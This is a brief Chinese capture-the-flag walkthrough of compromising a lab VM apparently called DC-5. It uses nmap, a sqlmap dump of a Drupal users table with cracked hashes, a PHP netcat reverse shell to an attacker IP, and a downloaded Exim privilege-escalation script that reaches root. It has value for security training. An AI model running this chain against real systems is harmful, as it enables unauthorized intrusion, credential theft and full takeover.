ifconfig
查找主机IP
扫一波内网,探测下存活主机
nmap 192.168.61.0/24
使用nmap工具对DC-5靶机扫描开放的端口
nmap -A -T4 192.168.61.137 -p- -oN nmap137.A
点不同的选项,uid会变
猜测有sql注入
sqlmap -u "http://192.168.61.137/?nid=1"
sqlmap -u "http://192.168.61.137/?nid=1" --dbs
数据库:d7db 和 information_schema
sqlmap -u "http://192.168.61.137/?nid=1" -D d7db --tables
sqlmap -u "http://192.168.61.137/?nid=1" -D d7db -T users --columns
sqlmap -u "http://192.168.61.137/?nid=1" -D d7db -T users -C "uid,name,pass" --dump
<blank> <blank>
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
把密码保存到passwd.txt里
然后 john passwd.txt
得到密码 turtle (john的密码)
扫描后台
dirb http://192.168.61.137
192.168.61.137/user
这里可以插入木马(不过还有界面里可以上传文件,不知道会不会有文件上传漏洞)
反弹shell
插入<?php system("nc -e /bin/bash 192.168.61.129 7777"); ?>
然后在concat us页面提交
虚拟机:
nc -lvvp 7777
然后提权
反弹交互式shell
python -c 'import pty;pty.spawn("/binbash")'
查看设置了suid的权限
find / -perm -u=s -type f 2>/dev/null
exim命令在使用时具有root权限
有很多exp脚本,那么我们先看看靶机的exim的版本信息:
Exim 4.87 - 4.91 - Local Privilege Escalation
利用这个漏洞
下载代码
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
进入root权限的/var/www/html
cd /var/www/html
vim wb.sh
写入46996.sh的内容
开启云服务器
service apache2 start
在靶机上:
cd /tmp (要进入/tmp,要不然权限不够)
在靶机上下载文件46996.sh
wget 192.168.61.129/wb.sh
然后赋予权限
chmod 4777 wb.sh (4777:把所有权限赋予)
然后可以运行
./wb.sh
但是没有提权到root
./wb.sh -m netcat
再看就可以看到是root权限了
cd /root
ls
cat flag.txt